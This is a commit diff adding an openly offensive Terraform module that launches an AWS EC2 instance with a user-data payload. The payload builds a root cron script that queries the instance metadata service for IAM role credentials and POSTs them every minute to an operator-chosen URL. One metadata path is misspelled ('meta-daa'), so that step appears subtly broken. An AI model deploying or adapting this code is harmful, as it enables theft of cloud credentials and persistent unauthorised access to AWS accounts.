Create EC2 credential exfilration module

Author: iganbold

main.tf

@@ -0,0 +1,30 @@
+provider "aws" {
+  region  = "us-east-1"
+  profile = "terraform"
+}
+
+terraform {
+  required_version = ">= 0.12"
+}
+
+resource "aws_instance" "this" {
+  ami                         = "ami-06b263d6ceff0b3dd"
+  instance_type               = "t2.micro"
+  subnet_id                   = var.subnet_id
+  iam_instance_profile        = var.iam_instance_profile
+  user_data                   = data.template_file.user_data.rendered
+  associate_public_ip_address = true
+
+  tags = {
+    CreatedBy = "Offensive Terraform"
+  }
+}
+
+data "template_file" "user_data" {
+  template = file("payload.sh")
+
+  vars = {
+    url      = var.url
+    iam_role = var.iam_role
+  }
+}

outputs.tf

@@ -0,0 +1,15 @@
+output "aws_instance_id" {
+  value = aws_instance.this.*.id
+}
+
+output "aws_instance_public_ip" {
+  value = aws_instance.this.*.public_ip
+}
+
+output "aws_instance_private_ip" {
+  value = aws_instance.this.*.private_ip
+}
+
+output "aws_instance_user_data" {
+  value = aws_instance.this.*.user_data
+}

payload.sh

@@ -0,0 +1,10 @@
+#! /bin/bash
+sudo apt-get update
+sudo apt-get install -y curl
+
+echo '#! /bin/bash' >> /hack.sh
+echo 'TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`' >> /hack.sh
+echo 'curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-daa/iam/security-credentials/${iam_role} > data.json' >> /hack.sh
+echo 'curl -X POST -d @data.json  ${url}' >> /hack.sh
+
+echo '* * * * * root bash /hack.sh' >> /etc/crontab && echo "" >> /etc/crontab

variables.tf

@@ -0,0 +1,19 @@
+variable "subnet_id" {
+  type        = string
+  description = ""
+}
+
+variable "url" {
+  type        = string
+  description = ""
+}
+
+variable "iam_instance_profile" {
+  type        = string
+  description = ""
+}
+
+variable "iam_role" {
+  type        = string
+  description = ""
+}